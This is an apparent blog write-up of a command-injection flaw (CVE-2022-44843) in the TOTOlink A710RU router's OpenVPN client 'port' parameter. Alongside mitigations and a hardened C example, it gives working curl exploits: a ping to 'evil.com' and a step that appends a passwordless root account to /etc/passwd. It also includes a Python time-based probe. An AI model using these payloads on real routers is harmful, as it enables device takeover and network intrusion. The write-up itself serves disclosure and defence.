CVE-2022-44843 - Command Injection Vulnerability in TOTOlink A710RU V7.4cu.2313_B20191024 (With Exploit Details)

Command injection flaws are some of the most dangerous security issues, especially in network devices like routers. Today, I'll break down a real-world vulnerability, CVE-2022-44843, affecting the TOTOlink A710RU router (firmware version V7.4cu.2313_B20191024), explain why it's critical, how it works (including code snippets), and give you everything you need to understand and confirm it.

What Is The Issue?

A researcher discovered that the TOTOlink A710RU router (with the above firmware version) does not validate or escape the port parameter of the setting/setOpenVpnClientCfg function before using it in a shell command. In plain English: if you can reach the router's web interface (from its LAN or Wi-Fi, for example) and get past the login, you can send a crafted request that makes the router execute any system command. This means you can potentially take over the router, alter its behavior, plant backdoors, or pivot attacks into the network.

The Endpoint

The TOTOlink A710RU has a web management page where you can set up an OpenVPN client. This setup includes specifying the VPN server port:

POST http://<router_ip>/setting/setOpenVpnClientCfg

It takes several parameters; amongst them, port. The path above mirrors the function name given in the CVE description. Confirm the exact request format (path, parameter names, and whether a login session cookie is required) against the published PoC before relying on it.

The Vulnerability

Inside the router backend code, the value of the port parameter is inserted directly into a command string that is then handed to the shell (via system() or an equivalent), with no allow-list check, filtering, or escaping. That means whatever string you put in that field is parsed and run by the router's OS shell.

Vulnerable code logic (pseudo)

// Simplified pseudo-code based on vulnerability research (illustrative, not the vendor's source)
#include <stdio.h>
#include <stdlib.h>

void start_openvpn_client(const char *remote, const char *port) {
    char cmd[256];
    // 'port' comes straight from the POST body: no allow-list, no escaping
    snprintf(cmd, sizeof(cmd), "openvpn --remote %s --port %s", remote, port);
    system(cmd); // Dangerous: /bin/sh -c interprets ';', '|', '`', '$()' inside 'port'
}

Notice that if port contains any shell metacharacter (; is the simplest, but |, &&, backticks and $() work the same way), you can terminate the intended command and append another, attacker-chosen, instruction that the shell runs right after it.

Crafting The Exploit

If you are on the router's network (connected to its Wi-Fi, for example) and can reach the admin interface, you can craft an HTTP POST request with a malicious port value.

Say you want the router to ping an external host, as a test or as an out-of-band confirmation that the command ran (watch for the ICMP traffic on a host you control):

curl -X POST \
  -d "remote=1.2.3.4&port=443;ping -c 4 evil.com;" \
  "http://<router_ip>/setting/setOpenVpnClientCfg"

Here, port=443;ping -c 4 evil.com; is the injected value: the first ; terminates the intended openvpn command, and the ping runs after it as a second shell command; the trailing ; separates it from anything the firmware appends after the port. Add the admin session cookie with -b if the interface requires login. The -d body is sent as-is; if the web server rejects the raw space, URL-encode it (%20) or use curl's --data-urlencode.

For example, to add a root-equivalent account (UID 0) at the OS level:

curl -X POST \
  -d "remote=1.2.3.4&port=443;echo hacker::0:0:hacker:/root:/bin/sh >> /etc/passwd;" \
  "http://<router_ip>/setting/setOpenVpnClientCfg"

Two caveats: the passwd entry must follow the name:password:uid:gid:gecos:home:shell layout (an empty password field means no password, and BusyBox-based firmware has /bin/sh rather than /bin/bash), and on many routers /etc sits on a read-only squashfs, so the append fails silently. Do not run this against a device you rely on.

Impact: High. Arbitrary OS command execution with the privileges of the web server process, which on consumer routers of this kind is typically root.

- Authentication? By default the endpoint sits behind the web login, so an attacker needs a valid session or credentials. In practice that bar is low: default or weak admin passwords are common, and some owners expose the admin interface to the WAN.

How To Test Safely

Only test routers you own or have explicit permission to test.  
The output of an injected command is normally not reflected in the HTTP response, so a plain port=443;ls /; tells you little on its own. Use a side channel instead: a delay (port=443;sleep 5; should add about five seconds to the response time on a vulnerable device) or an out-of-band callback such as the ping from the previous section, observed with tcpdump on the host you control.

Python test script

import requests

# Replace with the router's LAN address. Add session cookies or auth
# (e.g. a requests.Session() that has logged in) if the admin page
# requires login, which it normally does.
url = "http://<router_ip>/setting/setOpenVpnClientCfg"
payload = {
    "remote": "1.2.3.4",
    # Time-based check: the injected sleep delays the response by ~5 s on a
    # vulnerable device, which is observable even though command output is not.
    "port": "443;sleep 5;",
}

r = requests.post(url, data=payload, timeout=30)
elapsed = r.elapsed.total_seconds()
print(r.status_code, "elapsed: %.1f s" % elapsed)
if elapsed >= 5:
    print("Response delayed by the injected sleep: device looks vulnerable")

A delay of roughly five seconds (compare against a baseline request with port=443) or the ping arriving at your host confirms the flaw. Stop there: do not write to the device's filesystem to prove the point.

Mitigation

1. Update Firmware:  
TOTOlink may have released newer firmware. Check their support/download page for the A710RU and install the latest version.

2. Block WAN/Web Access:  
Prevent access to the web admin page from the internet and untrusted networks, and set a strong, unique admin password.

3. Harden Input Handling:  
Router vendors must never pass user-controlled strings to system() or popen(). Validate against an allow-list (a port is an integer between 1 and 65535, nothing else) and launch helper programs through the exec family with an argv array, so no shell ever parses the input.
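The vulnerable pattern from the pseudo-code above and the hardening in item 3, side by side, as an added example: this is not code from the original page, from TOTOlink, or from any PoC. It is a stand-alone C program in which build_cmd_unsafe shows the string a shell would receive, parse_port and valid_remote are the allow-list checks (it goes slightly beyond the page by validating the remote host too), and spawn_no_shell launches the binary through fork/execvp with an argv array so no shell ever parses the input. The function names, the "openvpn --remote ... --port ..." command line, and the use of /bin/echo in place of openvpn are assumptions for illustration; the sample inputs are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (assumed shape of the firmware's call): the
 * attacker-controlled 'port' is spliced into a string that system() hands
 * to /bin/sh -c, so ';', '|', '&&', '`' and '$()' all break out of the
 * intended invocation. Returns the command string so it can be inspected. */
int build_cmd_unsafe(char *out, size_t outlen, const char *remote, const char *port)
{
    return snprintf(out, outlen, "openvpn --remote %s --port %s", remote, port);
}

/* Hardened: accept only a decimal port in 1..65535 and nothing else.
 * Returns the port, or -1 if the string is anything but a plain port. */
int parse_port(const char *s)
{
    if (s == NULL || *s == '\0' || strlen(s) > 5)
        return -1;
    for (const char *p = s; *p; p++)
        if (!isdigit((unsigned char)*p))
            return -1;
    long v = strtol(s, NULL, 10);
    return (v >= 1 && v <= 65535) ? (int)v : -1;
}

/* Hardened: allow-list for the remote host (hostname or IPv4 characters only). */
int valid_remote(const char *s)
{
    if (s == NULL || *s == '\0' || strlen(s) > 253)
        return 0;
    for (const char *p = s; *p; p++)
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != '-')
            return 0;
    return 1;
}

/* Hardened launch: validate, then fork + execvp with an argv array. No shell
 * is involved, so even a metacharacter that somehow passed validation would
 * reach 'bin' as one literal argument, not as a second command. 'bin' is a
 * parameter only so the demo can use /bin/echo instead of openvpn.
 * Returns the child's exit status, or -1 on validation or spawn failure. */
int spawn_no_shell(const char *bin, const char *remote, const char *port)
{
    char portbuf[6];
    int p = parse_port(port);
    if (p < 0 || !valid_remote(remote))
        return -1;
    snprintf(portbuf, sizeof portbuf, "%d", p);
    char *const argv[] = { (char *)bin, "--remote", (char *)remote,
                           "--port", portbuf, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(bin, argv);
        _exit(127);               /* exec failed in the child */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample input: the page's injection string. */
    const char *remote = "1.2.3.4";
    const char *evil = "443;ping -c 4 evil.com;";
    char cmd[256];

    build_cmd_unsafe(cmd, sizeof cmd, remote, evil);
    printf("shell would run: %s\n", cmd);          /* ping follows the ';' */

    printf("parse_port(\"443\") = %d\n", parse_port("443"));
    printf("parse_port(evil)    = %d\n", parse_port(evil));   /* rejected */

    /* /bin/echo stands in for openvpn: the clean port arrives as one argv entry */
    spawn_no_shell("/bin/echo", remote, "443");
    /* the injection string never reaches exec; validation fails first */
    printf("spawn with evil port -> %d\n", spawn_no_shell("/bin/echo", remote, evil));
    return 0;
}
```

The fix has two independent layers on purpose: the allow-list rejects anything that is not a port, and the argv-based exec removes the shell entirely, so a bug in one layer does not reopen the injection.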

References

- CVE-2022-44843 NIST entry
- Exploit details at vulncheck.com
- Original GitHub PoC (Chinese), with raw HTTP exploit samples

Conclusion

CVE-2022-44843 is a serious command injection bug in the TOTOlink A710RU router firmware that is easy to exploit and allows attackers to execute arbitrary commands with root privileges. If you have one of these routers, upgrade ASAP or restrict admin access. For researchers and defenders, this is a classic example of why input validation in embedded software is critical.


*Stay safe, patch your stuff, and always use strong passwords on your routers!*

Timeline

Published on: 11/25/2022 20:15:00 UTC
Last modified on: 12/01/2022 17:45:00 UTC